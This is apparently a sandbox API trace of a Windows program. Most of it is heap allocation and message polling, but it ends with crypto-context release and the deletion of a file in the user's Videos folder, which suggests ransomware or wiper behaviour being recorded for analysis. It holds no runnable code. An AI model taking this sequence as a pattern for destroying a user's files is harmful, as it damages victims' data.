[0212.497] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab428 [0212.497] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0212.497] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0212.497] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bb8 [0212.497] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ce8 [0212.497] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab338 [0212.497] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab368 [0212.497] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c88 [0212.497] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab1d0 [0212.497] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c88 | out: hHeap=0x2af0000) returned 1 [0212.497] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d38 [0212.497] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78250 [0212.497] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0212.497] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78250 | out: hHeap=0x2af0000) returned 1 [0212.497] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d38 | out: hHeap=0x2af0000) returned 1 [0212.497] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab1d0 | out: hHeap=0x2af0000) returned 1 [0212.497] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab368 | out: hHeap=0x2af0000) returned 1 [0212.498] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab338 | out: hHeap=0x2af0000) returned 1 [0212.498] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ce8 | out: hHeap=0x2af0000) returned 1 [0212.498] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bb8 | out: hHeap=0x2af0000) returned 1 [0212.498] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e800 [0212.498] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0212.498] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e800 | out: hHeap=0x2af0000) returned 1 [0212.498] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0212.498] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d38 [0212.498] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71be8 [0212.498] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab308 [0212.498] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab2a8 [0212.498] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ce8 [0212.498] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab368 [0212.498] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ce8 | out: hHeap=0x2af0000) returned 1 [0212.498] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab368 | out: hHeap=0x2af0000) returned 1 [0212.498] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab2a8 | out: hHeap=0x2af0000) returned 1 [0212.498] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab308 | out: hHeap=0x2af0000) returned 1 [0212.498] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71be8 | out: hHeap=0x2af0000) returned 1 [0212.498] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d18 [0212.498] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7080 [0212.498] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab140 [0212.498] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab3c8 [0212.498] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d48 [0212.498] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab1d0 [0212.498] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d48 | out: hHeap=0x2af0000) returned 1 [0212.499] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab1d0 | out: hHeap=0x2af0000) returned 1 [0212.499] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab3c8 | out: hHeap=0x2af0000) returned 1 [0212.499] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab140 | out: hHeap=0x2af0000) returned 1 [0212.499] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7080 | out: hHeap=0x2af0000) returned 1 [0212.499] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d18 | out: hHeap=0x2af0000) returned 1 [0212.499] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d38 | out: hHeap=0x2af0000) returned 1 [0212.499] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab3c8 [0212.499] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab140 [0212.499] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab290 [0212.499] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab2c0 [0212.499] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab2d8 [0212.499] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab1e8 [0212.499] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fa8 [0212.499] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab3c8 | out: hHeap=0x2af0000) returned 1 [0212.499] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab218 [0212.499] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab2a8 [0212.499] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab338 [0212.499] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab2f0 [0212.499] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab308 [0212.499] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x38541e8 [0212.499] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77fa8 | out: hHeap=0x2af0000) returned 1 [0212.499] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab3c8 [0212.499] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab1d0 [0212.499] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab158 [0212.500] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab170 [0212.500] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab350 [0212.500] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab3e0 [0212.500] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d18 [0212.500] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab230 [0212.500] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab368 [0212.500] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bb8 [0212.500] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab380 [0212.500] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bb8 | out: hHeap=0x2af0000) returned 1 [0212.500] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab380 | out: hHeap=0x2af0000) returned 1 [0212.500] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab368 | out: hHeap=0x2af0000) returned 1 [0212.500] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab230 | out: hHeap=0x2af0000) returned 1 [0212.500] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d18 | out: hHeap=0x2af0000) returned 1 [0212.500] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ca8 [0212.500] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab230 [0212.500] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab188 [0212.500] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d98 [0212.501] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab1a0 [0212.501] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d98 | out: hHeap=0x2af0000) returned 1 [0212.501] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab1a0 | out: hHeap=0x2af0000) returned 1 [0212.501] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab188 | out: hHeap=0x2af0000) returned 1 [0212.501] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab230 | out: hHeap=0x2af0000) returned 1 [0212.501] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ca8 | out: hHeap=0x2af0000) returned 1 [0212.501] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab290 | out: hHeap=0x2af0000) returned 1 [0212.501] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab140 | out: hHeap=0x2af0000) returned 1 [0212.501] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab2c0 | out: hHeap=0x2af0000) returned 1 [0212.501] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab2d8 | out: hHeap=0x2af0000) returned 1 [0212.501] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab1e8 | out: hHeap=0x2af0000) returned 1 [0212.501] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab2a8 | out: hHeap=0x2af0000) returned 1 [0212.501] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab218 | out: hHeap=0x2af0000) returned 1 [0212.501] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab338 | out: hHeap=0x2af0000) returned 1 [0212.501] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab2f0 | out: hHeap=0x2af0000) returned 1 [0212.501] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab308 | out: hHeap=0x2af0000) returned 1 [0212.501] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab3c8 | out: hHeap=0x2af0000) returned 1 [0212.501] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab1d0 | out: hHeap=0x2af0000) returned 1 [0212.501] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab170 | out: hHeap=0x2af0000) returned 1 [0212.501] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab158 | out: hHeap=0x2af0000) returned 1 [0212.502] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab350 | out: hHeap=0x2af0000) returned 1 [0212.502] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab3e0 | out: hHeap=0x2af0000) returned 1 [0212.502] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x38541e8 | out: hHeap=0x2af0000) returned 1 [0212.502] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0212.502] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0212.502] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71be8 [0212.502] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78188 [0212.502] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d88 [0212.502] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0212.502] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0212.502] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71cd8 [0212.502] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0212.502] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0212.502] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0212.502] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0212.503] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0212.503] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0212.503] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0212.503] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0212.503] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0212.503] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0212.503] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0212.503] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0212.503] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0212.503] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0212.503] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0212.503] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0212.503] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x29f6f80, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0212.504] CryptReleaseContext (hProv=0xa7c660, dwFlags=0x0) returned 1 [0212.504] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0212.504] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0212.504] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0212.504] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0212.504] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0212.504] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0212.504] FreeLibrary (hLibModule=0x76390000) returned 1 [0212.504] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0212.504] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0212.504] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0212.504] CloseHandle (hObject=0x4f4) returned 1 [0212.506] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0212.506] CloseHandle (hObject=0x504) returned 1 [0212.514] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0212.515] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0212.515] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0212.515] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf438, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0212.516] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Videos/dbFeToW6SZRYrK03.flv", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\Videos\\dbFeToW6SZRYrK03.flv", lpFilePart=0x8cedf4*="dbFeToW6SZRYrK03.flv") returned 0x2b [0212.516] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Videos\\dbFeToW6SZRYrK03.flv" (normalized: "c:\\users\\fd1hvy\\videos\\dbfetow6szryrk03.flv")) returned 0x20 [0212.516] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\dbFeToW6SZRYrK03.flv", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8cbf59c0, ftCreationTime.dwHighDateTime=0x1d5cff7, ftLastAccessTime.dwLowDateTime=0xc30b7b30, ftLastAccessTime.dwHighDateTime=0x1d5d0e7, ftLastWriteTime.dwLowDateTime=0xc30b7b30, ftLastWriteTime.dwHighDateTime=0x1d5d0e7, nFileSizeHigh=0x0, nFileSizeLow=0x1770b, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="dbFeToW6SZRYrK03.flv", cAlternateFileName="DBFETO~1.FLV")) returned 0x9e2078 [0212.516] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\dbFeToW6SZRYrK03.flv" (normalized: "c:\\users\\fd1hvy\\videos\\dbfetow6szryrk03.flv")) returned 1 [0212.519] FindNextFileW (in: hFindFile=0x9e2078, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8cbf59c0, ftCreationTime.dwHighDateTime=0x1d5cff7, ftLastAccessTime.dwLowDateTime=0xc30b7b30, ftLastAccessTime.dwHighDateTime=0x1d5d0e7, ftLastWriteTime.dwLowDateTime=0xc30b7b30, ftLastWriteTime.dwHighDateTime=0x1d5d0e7, nFileSizeHigh=0x0, nFileSizeLow=0x1770b, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="dbFeToW6SZRYrK03.flv", cAlternateFileName="DBFETO~1.FLV")) returned 0 [0212.519] FindClose (in: hFindFile=0x9e2078 | out: hFindFile=0x9e2078) returned 1 [0212.521] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a74d90 | out: hHeap=0x2af0000) returned 1 [0212.521] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0212.521] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaeb8 | out: hHeap=0x2af0000) returned 1 [0212.521] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaea0 | out: hHeap=0x2af0000) returned 1 [0212.521] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab080 | out: hHeap=0x2af0000) returned 1 [0212.521] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0212.521] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf00 [0212.521] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae58 [0212.521] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a68 [0212.521] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafa8 [0212.522] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab050 [0212.522] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ab8 [0212.522] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafc0 [0212.522] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0212.522] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x29f7878 [0212.522] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a88 [0212.522] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0212.522] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab128 [0212.522] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf30 [0212.522] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab0c8 [0212.522] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaeb8 [0212.522] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab128 | out: hHeap=0x2af0000) returned 1 [0212.522] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaae70 [0212.522] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719b8 [0212.522] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf438, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0212.522] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaff0 [0212.522] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e68 [0212.522] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b08 [0212.522] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0212.522] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0212.522] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0212.523] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaeb8 | out: hHeap=0x2af0000) returned 1 [0212.523] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0c8 | out: hHeap=0x2af0000) returned 1 [0212.523] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae70 | out: hHeap=0x2af0000) returned 1 [0212.523] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf30 | out: hHeap=0x2af0000) returned 1 [0212.523] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafc0 | out: hHeap=0x2af0000) returned 1 [0212.523] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab050 | out: hHeap=0x2af0000) returned 1 [0212.523] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafa8 | out: hHeap=0x2af0000) returned 1 [0212.523] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a18 [0212.523] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7040 [0212.523] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae70 [0212.523] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x60) returned 0x2a74f30 [0212.523] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e68 | out: hHeap=0x2af0000) returned 1 [0212.523] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae70 | out: hHeap=0x2af0000) returned 1 [0212.523] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafc0 [0212.523] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafc0 | out: hHeap=0x2af0000) returned 1 [0212.523] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a78 [0212.523] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0212.523] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae70 [0212.523] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae70 | out: hHeap=0x2af0000) returned 1 [0212.523] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7040 | out: hHeap=0x2af0000) returned 1 [0212.524] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0212.524] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 